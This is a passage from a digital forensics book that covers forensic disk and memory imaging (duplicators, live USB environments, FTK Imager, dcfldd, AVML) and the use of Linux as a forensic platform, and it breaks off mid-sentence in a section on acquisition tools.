• Detect anti-forensic attempts targeted on the $MFT since $LogFile contains changes made to it.
• Tracks changes made to $MFT metadata such as MACB timestamps.
• Could help reconstruct a chronological list of transactions done to the files on the file system.
References
16.1 - Scientific law versus Scientific theories, by GliderMaven, under CC BY-SA 4.0¹⁹⁶, via
Wikimedia Commons¹⁹⁷
16.2 - The relationship between e-discovery and digital forensics, from 6th slide in DVD included
with E-Discovery: An Introduction to Digital Evidence¹⁹⁸, via YouTube¹⁹⁹
16.3 - Role of an Operating System, by Kapooht, CC BY-SA 3.0²⁰⁰, via Wikimedia Commons²⁰¹
16.4 - Our perception of truth depends on our viewpoint 2.0, by losmilzo²⁰², via Imgur²⁰³
16.5 - Puzzle Multicoloured Coloured, by Stefan Schweihofer²⁰⁴, under Simplified Pixabay License²⁰⁵,
via Pixabay²⁰⁶
¹⁹⁶https://creativecommons.org/licenses/by-sa/4.0
¹⁹⁷https://commons.wikimedia.org/wiki/File:Scientific_law_versus_Scientific_theories.png
¹⁹⁸https://www.amazon.com/Discovery-Introduction-Digital-Evidence-DVD/dp/1111310645
¹⁹⁹https://www.youtube.com/watch?v=btfCf9Hylns
²⁰⁰https://creativecommons.org/licenses/by-sa/3.0
²⁰¹https://commons.wikimedia.org/w/index.php?curid=25825053
²⁰²https://imgur.com/user/losmilzo
²⁰³https://imgur.com/gallery/obWzGjY
²⁰⁴https://pixabay.com/users/stux-12364/
²⁰⁵https://pixabay.com/service/license/
²⁰⁶https://pixabay.com/vectors/puzzle-multicoloured-coloured-3155663/
Chapter 9 - Forensic imaging in a
nutshell
By Guus Beckers²⁰⁷ | LinkedIn²⁰⁸
What is a disk image?
A disk image is a representation of the data contained on a disk. It contains the contents of the entire
disk, including all files and folders. Dedicated forensic hardware appliances or software packages
ensure a bit-by-bit copy is performed; in other words, the contents of the disk image will match the
contents of the disk exactly. When an unexpected error occurs, it will be flagged and the
forensicator will be notified. It is possible to make a disk image of any data source: desktop
computers, laptops and servers, a USB drive, an SD card, or any other storage medium you
can think of.
While a complete discussion of file systems is outside the scope of this chapter, it is impossible
to touch upon forensic imaging without talking about file systems. A file system is the logical
representation of files and folders on the disk. It allows an operating system to keep track of files
as well as other important file properties such as location, size, file format, and any associated
permissions. Different file systems are used across operating systems. The NTFS file system
is currently used by all supported versions of Microsoft Windows. APFS is used by devices created
by Apple, across a wide range of devices including phones, tablets, TV appliances, and computers.
Lastly, there is the Linux operating system, which uses a variety of file systems depending on the
version installed. Common varieties include ext3/ext4 and btrfs. More specialized file systems for
specific appliances are also in use. The exact intricacies and technical documentation of a file system
are often not available outside its vendor, which means that software vendors have to reverse
engineer a file system to a degree. Expect a forensic investigation suite to continually improve
support for popular file systems.
²⁰⁷http://discordapp.com/users/323054846431199232
²⁰⁸https://www.linkedin.com/in/guusbeckers/
Once a disk image has been created, it is possible to calculate its checksum. A checksum can be
used to verify the integrity of a disk image, which is of paramount importance during a forensic
investigation. Evidence will always need to be retrieved from other systems. Calculating a checksum
at both ends, for the source and destination file(s), will ensure that no anomalies are present. When
the checksums match at both ends, the contents of the files match exactly and the image can be used
in a forensic investigation. A checksum is created by hashing: a mathematical, one-way calculation
performed by a specific algorithm. The MD5 and SHA1 algorithms are commonly used in the
forensic community, although other algorithms can be used as well.
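As a minimal sketch on a Linux workstation, hashing the source device and the resulting image should produce identical digests for a successful bit-by-bit copy (the device name and file name are assumptions):

md5sum /dev/sdb
md5sum image.dd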
After validation of the checksum, the created image will be ready to use in an investigation. Forensic
investigation suites will use the disk image as a basis for the investigation, allowing a forensicator
to browse the file system for pertinent files and other forensic artifacts. Post-processing will also
occur in many forensic suites, automatically parsing popular artifacts, thereby making investigations
easier.
Creating a disk image
There are different ways to create a disk image; this section will discuss the most popular methods. Be
aware that different scenarios might require different imaging methods. The following subsections
are not ranked in order of preference.
Using a forensic duplicator
Forensic duplicators come in many shapes and sizes; the most common variety is a portable
hardware appliance that can be easily transported and used both in a lab environment and on-site
at a client. A forensic duplicator can be used to create disk images of various physical media
types. To do this, it distinguishes between source and destination drives. Source drives
are generally connected to the left side of the device, while destination drives are connected to the
right side. Be sure to confirm this with individual duplicators, as there might be
deviations. Forensic duplicators support a range of connectivity methods such as SATA,
IDE, and USB. The ports supported by a duplicator are mirrored on either side of the device. Ensure
that the correct drives are connected to the correct side of the device prior to imaging; failure
to do so might result in data erasure. Specialized duplicators also support SAS or an Ethernet
connection to image from a computer network.
Duplicators are used to perform the following functions:
• Clone a disk to a different disk
• Clone a disk to an image
• Format or wipe a disk
• Calculate hashes and verify disk integrity
• Detect a Host Protected Area (HPA) or Device Configuration Overlay (DCO)
• Detect blank disks, verifying whether a disk is entirely blank or contains data
Using a Live USB
In scenarios where it is not feasible to get access to physical media, a Live USB might provide an
alternative. A Live USB contains an operating system that can be booted during the boot phase
of a computer. For a Live USB to function, it is necessary to interrupt the boot cycle of the
computer and select the boot-from-USB option; manufacturers have different hotkeys to access this
functionality. Note that it is also possible to boot from a CD/DVD in a similar manner; in that case,
select the CD/DVD option. While it is still necessary to take a server or service offline, it is not
required to open it up and remove a hard drive. Similarly, continuous miniaturization means that some
SSDs can no longer be removed from the motherboard.
Luckily, there are a number of free Live USB tools that can be used to circumvent these limitations and
acquire forensic images. One of the best-known tools is CAINE (Computer Aided Investigative
Environment)²⁰⁹. CAINE is a Linux live environment that mounts any discovered drives as read-only
by default to ensure the forensic integrity of the disks. It provides GUI-based tools for the following
operations:
• Imaging of a disk (Guymager)
• Disk Image Mounter (Xmount)
• DDrescue
• Enabling write operations
• Mounting remote file systems across a network
In addition to its disk imaging tools, it provides a forensic environment that can be used to perform
most forensic operations, including accessing various file systems, recovering data, and performing
memory analysis.
Another example of a forensic Live USB environment is Sumuri Paladin Edge²¹⁰. This Live USB
environment is available free of charge. In addition to imaging the entire disk, it also allows you to
convert images, find specific files, extract unallocated space, and interface with network shares.
It is recommended to have a Live USB option within your lab at all times and to equip your
forensicators with USB drives in case of onsite client emergencies.
²⁰⁹www.caine-live.net
²¹⁰https://sumuri.com/paladin/
Disk imaging on Windows and Linux
Situations might occur when a particular system cannot be turned off. There are various ways to
perform a forensic acquisition depending on the operating system.
Windows
FTK Imager²¹¹ is a well-known tool for performing disk acquisitions on a Windows host. It is part of
the FTK forensic suite developed by Exterro (formerly AccessData); however, the imager is also
available free of charge. FTK Imager can either be installed on the host operating system or it can
be used in a “lite” mode. Lite mode is preferable as no changes are made to the disk; be aware,
however, that it does affect RAM.
FTK Imager can be used to perform the following operations:
• Disk acquisitions (both physical and logical)
• Memory acquisitions
• Acquisitions of the Windows Registry
• Browsing the file system and selecting relevant files/folders
The following steps can be used to create a “Lite” version which runs in memory. These steps are
based on the official guide provided by Exterro to the forensic community:
1. Install FTK Imager on another workstation
2. Insert a USB drive
3. Copy the installation folder to the USB-drive
4. Perform a hashing operation to verify file integrity
²¹¹https://www.exterro.com/forensic-toolkit
Linux
Linux has historically had an integrated utility capable of copying files called dd. dd can also be used
for disk imaging; however, it was not built with forensics in mind. A duo of utilities, called dcfldd
and dc3dd, is available to perform forensic disk imaging. Both tools can be used to perform disk
imaging; their main advantage over dd is integrated hashing support for various hashing
algorithms.
All three utilities use the Linux block devices available in /dev/ to perform a physical disk image
capture. An example of dcfldd is included below. Be warned that these tools can and will destroy
evidence if used incorrectly. In this particular instance, a 976 MB USB stick was inserted and the
block storage device sdb1 is used. An MD5 hash is generated, and the hash log is written to the
home folder along with the image.
dcfldd if=/dev/sdb1 conv=sync,noerror hash=md5 hashwindow=976M \
  hashlog=/home/example/hash.txt hashconv=after of=/home/example/image.dd
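For comparison, a roughly equivalent acquisition with dc3dd might look like the following (a minimal sketch; confirm the options against the man page of your installed version):

dc3dd if=/dev/sdb1 of=/home/example/image.dd hash=md5 log=/home/example/acq.log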
Virtual machines
Virtual machines have become commonplace in the IT industry, in short allowing an organization
to scale resources without purchasing additional hardware. The use of virtual machines is also
advantageous for imaging purposes: a client can simply send the virtual hard drive files for forensic
investigation. After performing the customary hashing procedures, these files can then be converted
if necessary. FTK Imager supports conversion of VMDK files to any other FTK image format, which
in turn can be used by a forensic program or forensic suite.
qemu-img²¹² can be used to convert various hard drive image formats to raw dd format. An example
covering the conversion of a VMDK file is included below.
qemu-img convert -f vmdk -O raw image.vmdk image.img
²¹²https://qemu.readthedocs.io/en/latest/index.html
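Before converting, qemu-img can also report an image’s format and virtual size, which serves as a useful sanity check:

qemu-img info image.vmdk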
Memory forensics
Background
While disk forensics focuses on forensic artifacts from files and folders, pertinent information
can also be readily available within a computer’s memory. A computer’s memory, called Random
Access Memory, or RAM for short, is used to carry out all active tasks of a computer. As such, it
contains a wealth of artifacts not available through other means. For instance:
• A list of active and (potentially) recently terminated processes
• Active network connections
• Entered system commands
• Open file handles
In order to collect this information, an application performs a memory dump. A memory dump
is exactly what it sounds like: the contents of the RAM extracted to disk. Be aware that as the size
of the RAM increases, an equivalent amount of disk space should be readily available for storage.
Furthermore, the RAM does not remain in stasis while the extraction takes place; it will continue to
perform tasks and will continue to change for the duration of the RAM dump.
Windows
A memory dump on Windows can be performed with multiple tools. FTK Imager was
already mentioned in the previous section. An alternative to FTK Imager in this regard is the utility
DumpIt²¹³. DumpIt can be used without installation on the host system. The directory it is launched
from also doubles as the destination directory; take this into consideration before performing a
memory dump.
Linux
There is no single version of Linux; every distribution has its own intricacies and (minor)
differences. A tool was needed that could perform a memory dump independent of installed kernels,
packages, or other dependencies. Microsoft actively develops AVML²¹⁴. AVML can be used to perform
a memory dump and also has a few tricks of its own: it supports compression of memory dumps
to decrease the amount of required disk space, as well as uploads to a Microsoft Azure Blob store.
²¹³https://github.com/thimbleweed/All-In-USB/tree/master/utilities/DumpIt
²¹⁴https://github.com/microsoft/avml
The standard usage of AVML is shown below:
avml output.lime
It is possible to generate a compressed image with the following command:
avml --compress output.lime.compressed
For a full set of commands please refer to the GitHub development page.
Virtual Machines
The prevalent use of virtual machines impacts memory acquisition as well, with its own advantages
and disadvantages. One advantage is that memory collection has become easier: a virtual machine
hypervisor allows a virtual machine to be suspended, hitting the pause button and freezing all
activity. During this process the contents of the RAM are written to disk, so no additional tools are
necessary to perform an acquisition. Files from popular vendors like VMware and VirtualBox can
be analyzed by memory analysis tools like Volatility.
Next Steps and Conclusion
This chapter was designed to help a forensicator hit the ground running when imaging a
desktop or server. What comes next in the investigation depends completely on the research questions
and associated context of the case itself. One final tip this chapter can provide is to focus on triage
first and foremost. SANS has developed a poster for this specific scenario as part of its FOR500 and
FOR508 courseware. It can be found at https://www.sans.org/posters/windows-forensic-analysis/.
For tips on scaling triage, check out Chapter 11 of this book, written by the same author.
Chapter 10 - Linux and Digital
Forensics
By Barry Grundy²¹⁵ | Website²¹⁶ | Discord²¹⁷
What is Linux?
There are plenty of resources available on what Linux is, what roles it fills, and how it compares
with other operating systems. Here we will discuss Linux from the perspective of digital forensics
and incident response.
There have been many discussions about what defines Linux. The classical definition is that Linux
is a kernel (the “brains” of the operating system) augmented by user space drivers, utilities, and
applications that allow us to interact with a computer in a useful manner. For the sake of simplicity,
we extend the name “Linux” to encompass the entire operating system and even the applications
that can be bundled and distributed.
Linux was developed by Linus Torvalds at the University of Helsinki back in the early 1990s. It was,
essentially, a “hobby” version of UNIX created for PC hardware.
²¹⁵https://github.com/bgrundy
²¹⁶https://linuxleo.com
²¹⁷http://discordapp.com/users/505057526421913600
On 25 August 1991, Torvalds posted this to the Usenet group comp.os.minix:
Hello everybody out there using minix
I’m doing a (free) operating system (just a hobby, won’t be big and
professional like gnu) for 386(486) AT clones. This has been
brewing since april, and is starting to get ready. I’d like any
feedback on things people like/dislike in minix, as my OS resembles
it somewhat (same physical layout of the file-system (due to
practical reasons) among other things).
I’ve currently ported bash(1.08) and gcc(1.40), and
things seem to work. This implies that I’ll get something
practical within a few months, and I’d like to know what features
most people would want. Any suggestions are welcome, but I won’t
promise I’ll implement them :-)
Linus (torvalds@kruuna.helsinki.fi)
PS. Yes - it’s free of any minix code, and it has a
multi-threaded fs. It is NOT portable (uses 386 task switching
etc), and it probably never will support anything other than
AT-harddisks, as that’s all I have :-(.
–Linus Torvalds (quoted from Wikipedia²¹⁸)
Modern Linux is an operating system very similar to Unix, deriving most of its functionality from
the much older AT&T Unix originally developed in the 1970s. Linux includes a full TCP/IP stack and
the GNU development tools to compile programs. In short, Linux is mostly compliant with the Portable
Operating System Interface for Unix (POSIX).
Despite the warnings about lack of architecture portability and limited support in Torvalds’
postscript, Linux has grown into a fully functioning operating system that supports a great deal of
modern hardware. Standard SATA hard drives through modern M.2 and NVMe storage are robustly
supported. Drivers and software support for newer motherboards and associated hardware are
constantly improving and growing. The Linux kernel, where most of this support resides, has a
very fast production cycle, and support for newer devices (where specifications are available) is
rapidly added in most cases.
For the digital forensics practitioner, this hardware compatibility issue can be exceedingly important.
Not only must we verify and test that our hardware is properly supported and functioning as
intended; but we also need to ensure that any subject hardware we might need to directly attach
to our system (which we might do for a variety of reasons) is also properly detected and supported.
This is often done via a direct physical connection, or via boot media on a subject system.
While we have given a very general definition of what Linux is and where it originated, we should
also mention what Linux is not, particularly where digital forensics is concerned. We will cover why
you might want to use Linux for digital forensics in a later section, but for now, a beginner forensics
²¹⁸https://en.wikipedia.org/wiki/History_of_Linux#The_creation_of_Linux
examiner should know that Linux is not a platform well-suited to “point-and-click”, or what some
might refer to as “Nintendo forensics” techniques. While there are graphical user interface (GUI)
tools available for Linux, it is not the strongest OS for that approach. More on that later.
Linux can be fairly easy to install, particularly given modern desktop GUI front ends for configuration
and settings. However, Linux is NOT a “better Windows”. Linux should not be approached as
a replacement for Microsoft Windows - one that acts like Windows and is supposed to be familiar
to someone who has been using Windows (or macOS for that matter) for years. Linux works very
differently from more mainstream operating systems. There is a steep learning curve, and
troubleshooting can seem overwhelming to someone used to running Windows on their computer.
It is possible to use Linux as a primary driver for digital forensics, and many digital forensic
practitioners have done this for years. That said, while Linux can be a fantastic learning tool and a
great way to access forensic and operating system utilities on an alternative platform, it will remain
a secondary operating system for most people new to the field.
Now that we have a very basic idea of what Linux is and is not, let’s discuss why we might decide
to add it to our digital forensic toolbox.
Why Linux for Digital Forensics
There are any number of reasons for choosing to learn and run Linux for use as a digital forensics
platform. We will cover the more important ones here.
Education
If you are a student of digital forensics or a practitioner looking to better understand a particular
forensic process, Linux provides an excellent environment for learning.
Particularly for students, the sheer number of free tools available for Linux - not to mention the
standard operating system utilities - makes it accessible to all levels of income. There is no need for
expensive licenses or dongles to do a full analysis or participate in training. While it is true that many
open source digital forensics utilities will compile and run natively on Windows, the ability to run
multiple copies of Linux, either on physical computers or in virtual machines, still makes it an attractive
alternative for learning.
Many of the tools available for digital forensics on Linux are meant to be used at the command
line interface (CLI). To a beginner, this can certainly appear daunting. But learning at the CLI
removes the clutter of a GUI and all the menus and mouse clicks required to complete a task. Most
Unix tools adhere to the philosophy that they should do one thing, and do it well. As you learn what
each tool does and how it works, you can string commands together to accomplish a whole series
of steps with one command using multiple tools all at once (commonly referred to as piping). This
approach allows you to concentrate on the results rather than on an interface with multiple windows
and views to sort through. Again, this is a benefit for education specifically. There is no doubt that
a forensic software suite that ingests and analyzes evidence and presents the results in a single step is
more efficient. But learning at the CLI with specific and very targeted output can be immensely
powerful for students.
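As a small illustration of that piping philosophy (a contrived sketch; the image name is hypothetical), the following counts the unique printable strings in an image that mention “password”, most frequent first:

strings -a image.dd | grep -i password | sort | uniq -c | sort -rn | head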
Free(dom)!
Freedom and flexibility are just two of the many attributes that can help make Linux a useful
addition to a forensic examiner’s toolbox.
First and foremost, of course, Linux is free. As mentioned earlier, this means we can install it as
many times and on as many computers (or virtual machines) as we like. You can use it as any sort of
server without tying up valuable budget resources on licensing. This goes for the forensic software
as well: you can install, copy, and share across multiple platforms and users, again without breaking
the bank.
For a practitioner learning the ins and outs of digital forensics, this can be very powerful. You
can install multiple copies of Linux across devices and virtual environments in a simple home lab;
deleting, reinstalling, and repurposing computer resources along the way. Installing and running
Linux is a great way to re-purpose old hardware, which brings us to our next point.
Linux provides unparalleled flexibility. It will run on all forms of hardware, from laptop and
desktop computers, to mobile devices and single board computers (SBC). It will run in a variety
of virtualization environments, up to and including Microsoft Windows’s own Windows Subsystem
for Linux (WSL/WSL2). You can choose to run a Linux distribution on a workstation, on a $50
Raspberry Pi, in a virtual machine, or natively in Windows using WSL. These all have their benefits
and drawbacks including cost, direct hardware access, convenience, and resource requirements.
Another facet of Linux’s flexibility lies in the number of choices, freely available, that users have
over their working environment. Desktop environments like KDE/Plasma²¹⁹, Gnome²²⁰ and XFCE²²¹
provide a wide range of choices that a user can customize for aesthetics or workflow efficiency. These
desktop environments don’t change the underlying operating system, but only the way one interacts
with that system. Paired with a separate window manager, there are hundreds of possibilities for
customization. While it may sound trivial, we are not discussing wallpaper and icon themes here.
We are talking about the flexibility to decide exactly how you interact with your workstation.
For example, you can set up a Linux environment that focuses on primarily CLI usage where the
keyboard is the primary interface and the mouse is rarely needed. This can be done with a wide
selection of “tiling” window managers that open new windows in a pre-determined arrangement and
allow for window manipulation, multiple workspaces, and program access all through customizable
keystrokes, with little or no need for a mouse. This is certainly not a configuration that will appeal to
everyone, but that is one of the joys of Linux - the ability to completely customize it to match your
particular workflow.
²¹⁹https://kde.org/plasma-desktop/
²²⁰https://www.gnome.org/
²²¹https://www.xfce.org/
Control
Another benefit of Linux over other operating systems has historically been the control
it provides over attached devices. This has always been one of the more important factors when
adopting Linux in the context of a forensic workstation. Most operating systems are designed to
isolate the user from the inner workings of hardware. Linux, on the other hand, has traditionally
allowed for much more granular control over attached devices and the associated drivers. This has
blurred somewhat in recent years with a number of popular Linux versions becoming more desktop-
oriented and relying more and more on automation and ease of operation. While this approach does
hide some of the control options from the user, they are generally still available.
Again, with advances in recent years, this level of hardware control is not as exclusive to Linux as
it once was.
Cross verification - An Alternate OS Approach
All of the preceding might come across as pushing Linux as a superior operating system for digital
forensics. That is most certainly not the intention. Rather, an effort has been made to point out the
strengths of Linux in comparison to other platforms. In reality, having Linux in your digital forensics
arsenal is simply having access to a particularly powerful alternative tool.
It is absolutely possible to utilize Linux as a primary digital forensic platform in today’s laboratory
environment. It is also a reality that providing timely and usable information for non-technical
investigators and managers often means utilizing the reporting and data sharing functionalities
available in modern forensic software suites that most often run under mainstream operating
systems and not Linux.
So where does Linux fit into a modern laboratory where reality and caseload dictate the use of
software suites with automated functionality?
As an alternative operating system, Linux is often used to troubleshoot hardware issues where one
platform either cannot detect or cannot access particular media. Linux is well known for its ability
to provide better diagnostic information and sometimes better detection for damaged or otherwise
misbehaving devices. When dealing with difficulties accessing a hard drive, for example, you will
often hear the advice “connect it to a Linux box”. Being able to directly monitor the kernel buffer
and view the interactions between hardware and the kernel can be a great help in solving hardware
issues.
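For example, after attaching a misbehaving drive, a quick look at the kernel buffer might show something like this (output abbreviated and illustrative):

$ # output is abbreviated and illustrative
$ sudo dmesg | tail
[ 1201.543210] usb 2-1: new high-speed USB device number 5 using xhci_hcd
[ 1201.772034] sd 6:0:0:0: [sdb] 1024000 512-byte logical blocks: (524 MB/500 MiB)
[ 1202.108115] blk_update_request: I/O error, dev sdb, sector 2048

Messages like these can quickly tell you whether a device is being detected at all, and where read errors begin.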
There is also the benefit of having a completely different operating system utilizing a different toolset
for cross-verification of findings. In some organizations, the cross-verification of significant analysis
results is a requirement. Depending on the situation, validating a result can make good sense even
when it is not explicitly required. Cross verification means that if a practitioner finds an artifact or
draws a particular conclusion on a given piece of evidence, the finding can be reproduced using a
different tool or technique.
Consider the following simplified example:
1. A forensic examiner extracts user-created contents (documents, emails, etc.) from computer
media and provides the data to an investigator using a common Windows forensic software
suite.
2. The investigator identifies a particular document that can be considered valuable to the case
being investigated and requests a report specific to that document.
3. The forensic examiner provides a targeted report detailing the document's properties: timestamps, ownership, where or how it might have originated on the media, etc.
4. The forensic examiner re-analyzes the specific document using a completely different tool
perhaps on a completely different operating system (Linux in this case). Does the alternate
tool identify the same location (physical disk location)? Are the timestamps the same? Is the
document metadata the same? Differences, if any, are investigated and explained.
The cross verification outlined above is somewhat simplified, but it provides an outline of how Linux
can be employed in a laboratory environment dominated by Windows software and the need for
efficient reporting. Using an alternative operating system and unique open source tools to cross-
verify specific findings can help eliminate concerns about automated processes and the integrity of
reports.
Another benefit of using Linux to cross-verify findings is that you will learn the OS as you integrate
it into your workflow rather than simply installing it and trying to make time to learn.
Choosing Linux
How does one start a journey into using Linux for digital forensics? We begin with a discussion of
distributions and selecting your platform’s “flavor” of Linux.
Distributions
A Linux distribution (or “distro” for short) is a collection of Linux components and compiled open-
source programs that are bundled together to create an operating system. These components can
include a customized and packaged kernel, optional operating system utilities and configurations,
custom-configured desktop environments and window managers, and software management utilities. These are all tied together with an installer that is usually specific to the given distribution.
Because of the open-source nature of the Linux environment, you could grab all the source code for
the various components and build your very own distribution, or at least a running version of Linux.
This is often referred to as “Linux from Scratch” (LFS). With a distribution, the developers do all the
heavy lifting for you. They package it all up and make the entire operating system available to you
for installation via a variety of methods.
Some popular distributions include, but are certainly not limited to:
• Ubuntu²²²
• Manjaro²²³
• Arch²²⁴
• Mint²²⁵
• SUSE²²⁶
• Red Hat²²⁷
• Slackware²²⁸
• and many others
So how does one choose a Linux distro, particularly for use as a digital forensics platform?
Choosing Your Platform
From the perspective of a digital forensics examiner, any distro will work within reason. The simplest
answer is to download any popular distribution and just install it. In the long run, just about any
flavor of Linux can be made to act and “feel” like any other.
If you want to do some research first, consider looking at what is already in use. Does your lab or
agency already use Linux in the enterprise? It may be a good idea to use a Linux version that closely
matches what your organization already has deployed. If part of your job is to respond to company
or agency incidents, a more intimate knowledge of the systems involved would be helpful.
Another legitimate answer to the question of “which distro?” is simply to see what others around
you are running. If you have co-workers or labmates that are running a specific version of Linux,
then it makes sense to do the same. Being able to consult with co-workers and friends makes getting
support much easier.
There are, however, other points that might warrant scrutiny. Ubuntu, as popular as it is, has
drifted toward a more desktop-oriented operating system. Configuration options and system settings
have been made much easier through a number of GUI utilities and enhancements that make the
distribution more focused on ease of use - the end user still has access to in-depth control of the
operating system, but there might be some work involved in disabling some of the automation that
might hamper forensic work (automatic mounting of attached storage, for example).
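On a GNOME-based Ubuntu desktop, for example, automounting can be switched off with a couple of settings (a sketch; the relevant keys vary by desktop environment and version):

$ # GNOME-specific; other desktops use different mechanisms
$ gsettings set org.gnome.desktop.media-handling automount false
$ gsettings set org.gnome.desktop.media-handling automount-open false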
Other Linux distributions offer a far simpler approach - minimally configured “out of the box”,
leaving it completely up to the user to configure the bells and whistles often considered normal
features for modern operating systems. Distributions like Slackware, Void Linux, and Gentoo fall into
²²²https://ubuntu.com/
²²³https://manjaro.org/
²²⁴https://archlinux.org/
²²⁵https://linuxmint.com/
²²⁶https://www.suse.com/
²²⁷https://www.redhat.com/en
²²⁸http://www.slackware.com/
this category. With these distributions, rather than making systemic changes to a heavily desktop-
oriented configuration, you can start with a more streamlined workstation and work up, building a
more efficient system. The learning curve, however, is steeper.
Another consideration is the choice between a rolling release and an incremental release distro.
Most operating systems are released in discrete numbered versions. Version X is released on a
given date and typically receives only security updates and bug fixes before the next major version.
Eventually, another release, version Y, is made available and so on. Distributions like Slackware,
Debian, and (generally) Ubuntu fall into this category. For the most part, this release schedule
is more stable, because components of the desktop and operating system are updated and tested
together before release. For the forensic examiner, this approach introduces fewer mass changes
to kernel components and software libraries that might affect the forensic environment or impact
evidence integrity and the interpretation of examination results.
A rolling release, on the other hand, continually updates software as new versions become available
for everything from the kernel to base libraries. This has the benefit of always keeping up with
the “latest and greatest”. Changes to upstream software are often immediately supported, though
the overall experience may be slightly less stable and polished. One obvious downside to choosing
a rolling distro is that wholesale changes to the operating system should trigger some validation
testing from the forensic examiner. There should be no doubt that a digital forensics platform is
operating exactly as expected. Constant mass upgrades can interfere with this by possibly breaking
or changing expected outputs or hardware behavior. Examples of rolling release distros include Arch,
Manjaro, Void, and Ubuntu Rolling Rhino.
There also exist ready-made distributions specifically designed for digital forensics. Kali Linux,
Caine, and Tsurugi Linux are common examples. These are generally used as bootable operating
systems for live investigations, but can also be installed directly on hardware to use in a lab.
These systems are ready to go with just about all the forensic software one might need to conduct
digital forensics, incident response, or even Open Source Intelligence (OSINT). From an education
perspective, ready-made forensic distributions have you up and running quickly, ready to learn the
tools. What you might miss, however, is actually setting up, finding, and installing the tools yourself,
all of which are part of the educational process.
If there are no organizational considerations, then consider using a popular distribution with wide
acceptance in the community. Ubuntu is the first distribution that comes to mind here. Much of
the forensic software available today for Linux is developed and tested on Ubuntu. There is a huge
support community for Ubuntu, so most questions that arise already have easily-accessible answers.
While this can be said for other distributions (Arch Linux comes to mind), Ubuntu is certainly the
most ubiquitous.
If you choose to chart your own course and use a distribution along the lines of Slackware or
Gentoo, you will start with a very ‘vanilla’ installation. From there, you will learn the ins and outs of
configuration, system setup, and administration without a lot of helpful automation. Customization
options are abundant and left almost entirely up to the user.
It may be helpful to create a virtual machine snapshot with the setup you come to prefer. That way,
a fresh copy can be deployed any time you need one without a lot of tedious prep.
Learning Linux Forensics
There are copious resources available for Linux learners, from distribution-specific tutorials and
Wiki pages to command-line-oriented blogs and websites. You can take an online course from
Udemy, edX, or even YouTube. Numerous presses publish dozens of books every year.
The digital forensics niche in Linux is no exception, though you may have to dig a bit for the
specific resources you need. Whether you are interested in “Linux forensics” as in using Linux as
your forensic platform or as digital forensics specifically on Linux systems, there is no shortage of
material for the motivated student.
Linux as a Platform
Most of what we have covered so far assumes an interest in choosing and installing Linux for use
as a platform to perform forensics, either as a primary operating system or as an adjunct for cross
verification.
To use Linux this way, first, we learn the operating system itself: installation, configuration, network
environment, and interface. This is common to all users, whether or not the system will be used for
digital forensics. We, however, must consider in particular whether there are any “out-of-the-box”
configurations or automations that interfere with evidence collection or integrity.
Second, there are the tools we need to learn. These fall into a number of categories:
• Evidence Acquisition
• Volume analysis
• File system analysis
• Application analysis
• Memory analysis
• Network enumeration and analysis
• Data parsing
There are specific tools (with some crossover) for each of these categories that we’ll cover in the next
sections.
The Law Enforcement and Forensic Examiner’s Introduction to Linux, the LinuxLEO guide²²⁹, is
available for free. Written by the same author as this chapter, it was produced as a complete introduction for beginners. It covers installing Linux, learning the operating system, and using forensic
tools to conduct hands-on exercises using sample practice files. The materials are freely available at
https://www.linuxleo.com.
²²⁹https://www.linuxleo.com
Linux as a Target
Perhaps you have no specific desire to use Linux as a day-to-day forensic platform. There is, however,
something to be said for knowing how Linux works and where to look for evidence should you be
assigned an analysis where the subject device runs a version of Linux.
For years now, Linux has been a popular server operating system, utilized in enterprise environments
across the world. In the past few years, there has been a steady growth of “desktop” Linux,
particularly with the emergence of user-oriented distributions like Ubuntu, Mint, and derivations
based on them. A growth in Linux-compatible software for specialized tasks such as video editing,
publishing, and even gaming has resulted in Linux being more widely adopted. While the platform
has always been well-represented in academia, the proliferation of Linux desktop applications has
resulted in a much wider user base.
Given the popularity of the Android operating system, which is (in simple terms) based on Linux,
there has always been a stronger need for familiarity with Linux in the analysis of mobile devices.
Note, however, that Android is not the same as the Linux we find on desktop computers. They are
similar for sure, but their file system structures and application analysis are widely divergent.
One of the biggest issues that arise when examining a Linux system is the breadth of options
available to a user on a customized desktop or server. For example, an examiner must be at least
somewhat familiar with a subject computer’s init system. Most modern distributions use systemd to
control processes and logging. Other distributions rely on the older text-based BSD init or System
V process scripts. In either case and depending on the nature of the investigation, knowing how
processes are started and how they are stopped might be an important part of the forensic puzzle.
Tracking and identifying user activity is often another important piece of the puzzle. With Linux,
regardless of distribution, users have a wide range of choices for desktop environments, window
managers, file managers, and many other desktop components. All of these components, some used
in combination, store configuration and user activity in different formats and locations which makes
having intimate knowledge of every possible iteration very difficult.
Even the very low-level components of a Linux installation can differ, sometimes within a single
distribution. Users can choose a different bootloader (which loads the operating system) or a
different file system format for various partitions. Most Linux distributions will use the Ext4 file
system by default, but it’s a simple matter to select and install any number of others depending on
preference and use case: Btrfs, XFS, ZFS, and JFS are all file systems you might encounter. Should an
examiner come across one of these, consideration would need to be given to file recovery, allocation
strategies to help determine file activity, and perhaps forensic software support.
All of these are challenges with examining any of the myriad permutations of Linux. There are a few
books covering the basics of Linux examinations. Much of the information available from a forensic
perspective can also be found in videos and seminars. For anyone looking for a challenging focus
for research or a subject for an academic project, Linux as a forensic target provides ample subject
matter for unique content.
Linux Forensics in Action
The information covered so far gives an overview of Linux and where it might fit in a digital forensic
workflow. For those just starting out, or for those that have never seen Linux in action before, it
might be useful to actually see a very simple command line session from acquisition through artifact
recovery and interpretation.
First, let’s map a quick outline of what we wish to accomplish, and the tools we will use:
1. Define the goal of the examination (scope)
2. Acquire the evidence (imaging)
3. Verify evidence integrity
4. Map the forensic image and find a volume of interest
5. Identify the file system format within that volume
6. Identify artifacts (e.g. files) of interest
7. Extract and examine the artifacts
8. Parse data from each artifact
The Tools
There are far too many tools to cover in a single chapter. Again, documents like the previously
mentioned LinuxLEO guide²³⁰ will cover a great number of tools with hands-on opportunities. Here
we will select just a few tools to do a quick analysis of a Microsoft Windows Registry file.
Purpose                               Tool
Acquisition                           dd, dc3dd, dcfldd, ddrescue, ewfacquire
Integrity verification (hashing)      md5sum, sha1sum, sha256sum, etc.
Volume / File System / File Analysis  The Sleuthkit (TSK): mmls, fsstat, fls, istat, icat, blkcalc, etc.
Windows Artifacts                     Libyal (multiple tools/libraries): libregf, libevtx, liblnk, libscca, libesedb, etc.
File Carving                          scalpel, foremost, bulk_extractor
Data Parsing                          General GNU Utilities: sed, awk, grep, etc.
²³⁰https://linuxleo.com
Acquisition Tools
The acquisition tools in the above table work in generally the same manner, creating “bit for bit” or
raw images that are essentially exact duplicates of the storage media being imaged. dd is the original
Linux tool used for basic forensic imaging. It was not explicitly designed for that, but it is useful in
